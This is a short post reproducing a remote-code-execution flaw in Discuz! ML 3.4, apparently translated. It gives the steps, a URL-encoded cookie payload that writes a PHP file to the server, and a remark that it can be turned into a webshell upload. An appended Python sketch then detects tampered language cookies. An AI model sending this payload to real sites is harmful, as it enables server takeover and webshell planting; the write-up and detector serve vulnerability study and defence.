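Reproducing the RCE getshell vulnerability in the latest Discuz! ML 3.4, disclosed the day before yesterday

First, set up the environment: download the latest version of Discuz! ML 3.4.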

https://bitbucket.org/vot/discuz.ml/get/tip.zip

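Install it on the target machine step by step; it is very simple.

Refresh the page and capture the request with Burp.

Modifying the *****_language cookie parameter makes arbitrary file upload possible.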

poc:%27%2e%20%66%69%6c%65%5f%70%75%74%5f%63%6f%6e%74%65%6e%74%73%28%27%68%79%63%63%2e%70%68%70%27%2c%75%72%6c%64%65%63%6f%64%65%28%27%25%33%63%25%33%66%70%68%70%20%25%32%30%25%37%30%25%36%38%25%37%30%25%36%39%25%36%45%25%36%36%25%36%46%25%32%38%25%32%39%25%33%42%25%33%66%25%33%65%27%29%29%2e%27

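After sending the request

The PoC can be modified to upload a one-line webshell, which successfully gets a shell.

Referenced from an article by 晏子霜 of the 圈子 community.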
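A detection sketch for the request described above, added here as an example and not taken from the original post or from the Discuz! ML code base. It assumes a legitimate `*_language` cookie only ever holds a short language code; the cookie prefix `abcd` and all sample headers are constructed placeholders.

```python
import re
from urllib.parse import unquote

# Assumption: a legitimate language cookie is a short code such as "en" or "sc".
SAFE_LANG = re.compile(r"[A-Za-z]{2,3}(?:[-_][A-Za-z]{2,4})?")

def suspicious_language_cookies(cookie_header):
    """Return (name, decoded_value) for each *_language cookie in a Cookie
    header whose value is not a plain language code."""
    hits = []
    for part in cookie_header.split(";"):
        name, sep, value = part.strip().partition("=")
        if not sep or not name.endswith("_language"):
            continue
        decoded = unquote(value)
        # Decode a few more rounds so double-encoded values are also caught.
        for _ in range(3):
            again = unquote(decoded)
            if again == decoded:
                break
            decoded = again
        if not SAFE_LANG.fullmatch(decoded):
            hits.append((name, decoded))
    return hits

# Constructed sample Cookie headers (not captured traffic).
SAMPLE_HEADERS = [
    "abcd_saltkey=x1y2; abcd_language=en; abcd_lastvisit=1563000000",
    "abcd_saltkey=x1y2; abcd_language=%27%2eEXAMPLE%2e%27",
    "abcd_language=sc",
    "abcd_language=%2527%252e",
]

def scan(headers):
    """Return (header_index, cookie_name, decoded_value) for every finding."""
    return [(i, n, v) for i, h in enumerate(headers)
            for n, v in suspicious_language_cookies(h)]

if __name__ == "__main__":
    for idx, name, value in scan(SAMPLE_HEADERS):
        print(f"header {idx}: {name} carries non-language value {value!r}")
```

The same allowlist check can be enforced at a reverse proxy or WAF to reject the request outright instead of only logging it.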
